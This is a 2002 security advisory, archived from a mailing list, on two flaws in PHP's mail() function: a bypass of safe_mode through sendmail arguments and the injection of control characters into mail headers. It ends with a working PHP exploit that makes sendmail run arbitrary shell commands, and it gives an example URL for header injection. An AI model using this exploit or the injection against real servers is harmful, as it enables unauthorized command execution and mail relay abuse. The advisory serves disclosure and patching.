-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Product: PHP Version: 4.x up to 4.2.2 Vendor: http://www.php.net/ Author: Wojciech Purczynski <cliphat_private> Date: June 13, 2002 Updated: August 23, 2002 Released: August 21, 2002 Issue: ====== Two vulnerabilities exists in mail() PHP function. The first one allows to execute any program/script bypassing safe_mode restriction, the second one may give an open-relay script if mail() function is not carefully used in PHP scripts. Description: ============ PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Details: ======== (1) Bypassing safe_mode restriction If PHP is configured with safe_mode option enabled, special restriction are set up including limit on external binaries that may be executed from within a PHP script. The 5th argument to the mail() function (introduced in version 4.0.5) allow specifying command line option to the sendmail binary. Some time ago a bug was found in the mail() function allowing to pass shell meta-characters in the 5th argument, leading to execute arbitrary shell commands or external binaries. This bug was fixed in version 4.1.0. However, mail() function is still vulnerable because it allows to pass command line arguments to the sendmail binary which gives the ability to influence its behavior (i.e. by using non-default aliases, custom configuration files - other cases are possible with others MTAs) Passing 5th argument should be disabled if PHP is configured in safe_mode. Exploit attached at the end. (2) Injecting ASCII control characters into mail() arguments Arbitrary ASCII control characters may be injected into string arguments of mail() function. If mail() arguments are takeon from user's input it may give the user ability to alter message content including mail headers. Example of such a vulnerability may be found on PHP.net site: (URL wrapped for readability) http://www.php.net/mailing-lists.php? maillist=yourat_private%0a&email=fakeat_private%0a PHP should do content filtering before creating message body sent with "sendmail -t" command. Impact: ======= (1) Any user may bypass safe_mode restrictions if mail() function is not disabled. (2) Open-relay PHP script if user's data is poorly or not filtered and passed to the mail() function. Exploit: ======== Sample exploit for (1) that works with sendmail MTA: - -----8<----- bypass_safe_mode.php -----8<----- <? $script=tempnam("/tmp", "script"); $cf=tempnam("/tmp", "cf"); $fd = fopen($cf, "w"); fwrite($fd, "OQ/tmp Sparse=0 R$*" . chr(9) . "$#local $@ $1 $: $1 Mlocal, P=/bin/sh, A=sh $script"); fclose($fd); $fd = fopen($script, "w"); fwrite($fd, "rm -f $script $cf; "); fwrite($fd, $cmd); fclose($fd); mail("nobody", "", "", "", "-C$cf"); ?> - -----8<----- bypass_safe_mode.php -----8<----- Fix: ==== (1) has been successfully fixed in the latest CVS snapshot. Fix for the (2) is not sufficient and it is still possible to inject ASCII control characters that causes argument string to be truncated. Please refer to the example URL mentioned above. These bugs haven't been fixed yet in the latest 4.2.2 stable release. - -- Wojciech Purczynski iSEC Security Research http://isec.pl/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9ZeSsC+8U3Z5wpu4RAsqBAKC04X7sCrcOQOXjpXgPqDXQjUEufgCfcokE 5n+9UMdQVqw1HYdh2opFsjY= =iKiW -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Fri Aug 23 2002 - 11:46:05 PDT